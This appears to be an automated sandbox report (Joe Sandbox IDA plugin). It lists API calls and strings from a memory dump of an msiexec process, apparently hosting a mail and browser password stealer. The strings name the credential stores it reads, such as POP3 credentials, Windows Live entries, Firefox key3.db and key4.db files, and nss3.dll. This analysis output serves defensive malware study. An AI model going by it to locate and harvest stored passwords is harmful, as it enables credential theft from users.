                                                                                                      • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                      • API String ID: 1297977491-2001300268
                                                                                                      APIs
                                                                                                        • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                                                                                      • strchr.MSVCRT ref: 0040327B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: PrivateProfileStringstrchr
                                                                                                      • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                      • API String ID: 1348940319-1729847305
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(?,&quot;,00000006,?,?,00000000,0040ABBD,?,?), ref: 00411034
                                                                                                      • memcpy.MSVCRT(?,&amp;,00000005,?,?,00000000,0040ABBD,?,?), ref: 0041105A
                                                                                                      • memcpy.MSVCRT(?,&lt;,00000004,?,?,00000000,0040ABBD,?,?), ref: 00411072
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy
                                                                                                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                      • API String ID: 3510742995-3273207271
                                                                                                      APIs
                                                                                                        • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                                                                      • memset.MSVCRT ref: 0040FA1E
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                                                                                      • _strnicmp.MSVCRT ref: 0040FA4F
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                                      • String ID: WindowsLive:name=*$windowslive:name=
                                                                                                      • API String ID: 945165440-3589380929
                                                                                                      APIs
                                                                                                        • Part of subcall function 00410863: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                        • Part of subcall function 00410863: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                        • Part of subcall function 00410863: memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                        • Part of subcall function 00410863: CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                                                      • strchr.MSVCRT ref: 0040371F
                                                                                                      • _mbscpy.MSVCRT(?,00000001,?,?,?), ref: 00403748
                                                                                                      • _mbscpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 00403758
                                                                                                      • strlen.MSVCRT ref: 00403778
                                                                                                      • sprintf.MSVCRT ref: 0040379C
                                                                                                      • _mbscpy.MSVCRT(?,?), ref: 004037B2
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _mbscpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                                                      • String ID: %s@gmail.com
                                                                                                      • API String ID: 3261640601-4097000612
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004094C8
                                                                                                      • GetDlgCtrlID.USER32(?), ref: 004094D3
                                                                                                      • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                                                                                      • memset.MSVCRT ref: 0040950C
                                                                                                      • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                                                                                      • _strcmpi.MSVCRT ref: 00409531
                                                                                                        • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                                                                                      • String ID: sysdatetimepick32
                                                                                                      • API String ID: 3411445237-4169760276
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00403504
                                                                                                      • memset.MSVCRT ref: 0040351A
                                                                                                      • _mbscpy.MSVCRT(00000000,00000000), ref: 00403555
                                                                                                        • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                                                        • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                                                      • _mbscat.MSVCRT ref: 0040356D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _mbscatmemset$_mbscpystrlen
                                                                                                      • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                      • API String ID: 632640181-966475738
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A31
                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A47
                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A5F
                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A7A
                                                                                                      • EndDialog.USER32(?,00000002), ref: 00405A96
                                                                                                      • EndDialog.USER32(?,00000001), ref: 00405AA9
                                                                                                        • Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
                                                                                                        • Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
                                                                                                        • Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776
                                                                                                      • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
                                                                                                      • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Item$DialogMessageSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 2485852401-0
                                                                                                      APIs
                                                                                                      • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                                                                                      • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                                                                                      • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                                                                                      • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                                                                                      • GetSysColor.USER32(0000000F), ref: 0040B472
                                                                                                      • DeleteObject.GDI32(?), ref: 0040B4A6
                                                                                                      • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                                                                                      • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$DeleteImageLoadObject$Color
                                                                                                      • String ID:
                                                                                                      • API String ID: 3642520215-0
                                                                                                      APIs
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405BE9
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405C05
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405C2B
                                                                                                      • memset.MSVCRT ref: 00405C3B
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405C6A
                                                                                                      • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405CB7
                                                                                                      • SetFocus.USER32(?,?,?,?), ref: 00405CC0
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405CD0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 2313361498-0
                                                                                                      APIs
                                                                                                      • GetClientRect.USER32(?,?), ref: 0040BB33
                                                                                                      • GetWindowRect.USER32(?,?), ref: 0040BB49
                                                                                                      • GetWindowRect.USER32(?,?), ref: 0040BB5C
                                                                                                      • BeginDeferWindowPos.USER32(00000003), ref: 0040BB79
                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040BB96
                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040BBB6
                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040BBDD
                                                                                                      • EndDeferWindowPos.USER32(?), ref: 0040BBE6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Defer$Rect$BeginClient
                                                                                                      • String ID:
                                                                                                      • API String ID: 2126104762-0
                                                                                                      APIs
                                                                                                      • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                                                                                      • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                                                                                      • GetDC.USER32(00000000), ref: 004072FB
                                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                                                                                      • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                                                                                      • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                                                                                      • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                                                                                      • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                                                                                      • String ID:
                                                                                                      • API String ID: 1999381814-0
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpymemset
                                                                                                      • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                                                                                      • API String ID: 1297977491-3883738016
                                                                                                      APIs
                                                                                                        • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                                                                                        • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                                                                                        • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                        • Part of subcall function 00449550: memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044972E
                                                                                                      • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044977B
                                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 004497F6
                                                                                                        • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000040,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 00449291
                                                                                                        • Part of subcall function 00449260: memcpy.MSVCRT(00000001,00449392,00000008,?,?,?,00449392,?,?,?,?,004497AE,?,?,?,00000000), ref: 004492DD
                                                                                                      • memcpy.MSVCRT(?,?,00000000), ref: 00449846
                                                                                                      • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 00449887
                                                                                                      • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 004498B8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memset
                                                                                                      • String ID: gj
                                                                                                      • API String ID: 438689982-4203073231
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __aulldvrm$__aullrem
                                                                                                      • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                                                                                      • API String ID: 643879872-978417875
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040DAE3
                                                                                                      • memset.MSVCRT ref: 0040DAF7
                                                                                                      • memset.MSVCRT ref: 0040DB0B
                                                                                                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 0040784E
                                                                                                        • Part of subcall function 0040783C: strlen.MSVCRT ref: 00407856
                                                                                                        • Part of subcall function 0040783C: _memicmp.MSVCRT ref: 00407874
                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DBD8
                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC1B
                                                                                                      • memcpy.MSVCRT(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC38
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpymemset$strlen$_memicmp
                                                                                                      • String ID: user_pref("
                                                                                                      • API String ID: 765841271-2487180061
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                                                                                      • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                                                                                      • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                                                                                      • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                                                                                      • memset.MSVCRT ref: 004058C3
                                                                                                      • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                                                                                      • SetFocus.USER32(?), ref: 00405976
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$FocusItemmemset
                                                                                                      • String ID:
                                                                                                      • API String ID: 4281309102-0
                                                                                                      APIs
                                                                                                        • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                        • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                                                                                      • _mbscat.MSVCRT ref: 0040A8FF
                                                                                                      • sprintf.MSVCRT ref: 0040A921
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileWrite_mbscatsprintfstrlen
                                                                                                      • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                      • API String ID: 1631269929-4153097237
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040810E
                                                                                                        • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT(?,Cry,?,004039AA), ref: 004046BA
                                                                                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                                                                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                                                                                      • LocalFree.KERNEL32(?,?,?,?,?,00000000,682F7B60,?), ref: 004081B9
                                                                                                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                                                                                        • Part of subcall function 00406F06: memcpy.MSVCRT(?,00401CA1,00000000,00000000,00401CA1,00000001), ref: 00406F20
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                                                                                      • String ID: POP3_credentials$POP3_host$POP3_name
                                                                                                      • API String ID: 524865279-2190619648
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00406B8E
                                                                                                      • strlen.MSVCRT ref: 00406B99
                                                                                                      • strlen.MSVCRT ref: 00406BFF
                                                                                                      • strlen.MSVCRT ref: 00406C0D
                                                                                                      • strlen.MSVCRT ref: 00406BA7
                                                                                                        • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                                                        • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: strlen$_mbscat_mbscpymemset
                                                                                                      • String ID: key3.db$key4.db
                                                                                                      • API String ID: 581844971-3557030128
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000010.00000002.1958258880.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                      • String ID: 0$6
                                                                                                      • API String ID: 2300387033-3849865405
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004076D7
                                                                                                      • sprintf.MSVCRT ref: 00407704
                                                                                                      • strlen.MSVCRT ref: 00407710
                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                      • strlen.MSVCRT ref: 00407733
                                                                                                      • memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: memcpystrlen$memsetsprintf
                                                                                                      • String ID: %s (%s)
                                                                                                      APIs
                                                                                                      • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                                      • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                                      • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                                      • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: Temp$ClipboardDirectoryErrorFileLastNameOpenPathWindows
                                                                                                      • String ID: pw/h
                                                                                                      APIs
                                                                                                      • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                                                                                      • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,?,?,?), ref: 004108C3
                                                                                                      • CoTaskMemFree.COMBASE(?), ref: 004108D2
                                                                                                      Strings
                                                                                                      • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                                                                                                      • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                                                                                                      Similarity
                                                                                                      • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                      • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: _mbscat$memsetsprintf
                                                                                                      • String ID: %2.2X
                                                                                                      APIs
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000002,?), ref: 004441C2
                                                                                                      • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                                                                                        • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                                                                                        • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                                                                                        • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                        • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                        • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                                                                                        • Part of subcall function 00444059: memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
                                                                                                        • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT(00000000,004441FB,?,00000000), ref: 0044417E
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 004441FC
                                                                                                      • CloseHandle.KERNEL32(?), ref: 00444206
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: File$??2@??3@$ByteCharCloseHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                      • String ID: ACD
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 004091EC
                                                                                                      • sprintf.MSVCRT ref: 00409201
                                                                                                        • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                                                                                        • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                        • Part of subcall function 0040929C: _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                      • SetWindowTextA.USER32(?,?), ref: 00409228
                                                                                                      • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                                                                                      • String ID: caption$dialog_%d
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(00000020,?,00000001), ref: 0042696E
                                                                                                      Strings
                                                                                                      • unknown error, xrefs: 004277B2
                                                                                                      • abort due to ROLLBACK, xrefs: 00428781
                                                                                                      • no such savepoint: %s, xrefs: 00426A02
                                                                                                      • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                                                                                      • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                                                                                      Similarity
                                                                                                      • API ID: memcpy
                                                                                                      • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: memset
                                                                                                      • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                                                                                      APIs
                                                                                                      • memcpy.MSVCRT(00000058,00451D20,00000030,?,00000143,00000000,004067AF,?), ref: 00442A5E
                                                                                                        • Part of subcall function 0044257F: memcmp.MSVCRT(?,file:,00000005,00000000,00000000,BINARY,?,?,?,?,00442B47,00000000), ref: 004425C8
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: memcmpmemcpy
                                                                                                      • String ID: BINARY$NOCASE$RTRIM$main$temp
                                                                                                      APIs
                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                                                                                      • memset.MSVCRT ref: 00410246
                                                                                                      • memset.MSVCRT ref: 00410258
                                                                                                        • Part of subcall function 004100CC: _mbscpy.MSVCRT(?,-00000001), ref: 004100F2
                                                                                                      • memset.MSVCRT ref: 0041033F
                                                                                                      • _mbscpy.MSVCRT(?,?,?,00000000,00000118), ref: 00410364
                                                                                                      • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                                                                                                      Similarity
                                                                                                      • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                                                                                      APIs
                                                                                                      • wcslen.MSVCRT ref: 0044406C
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000001,004441FB,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 00444075
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                                                        • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                                                      • strlen.MSVCRT ref: 004440D1
                                                                                                        • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT(?,?,004440DF), ref: 00443507
                                                                                                        • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT(00000001,?,004440DF), ref: 00443516
                                                                                                      • memcpy.MSVCRT(?,00000000,004441FB), ref: 004440EB
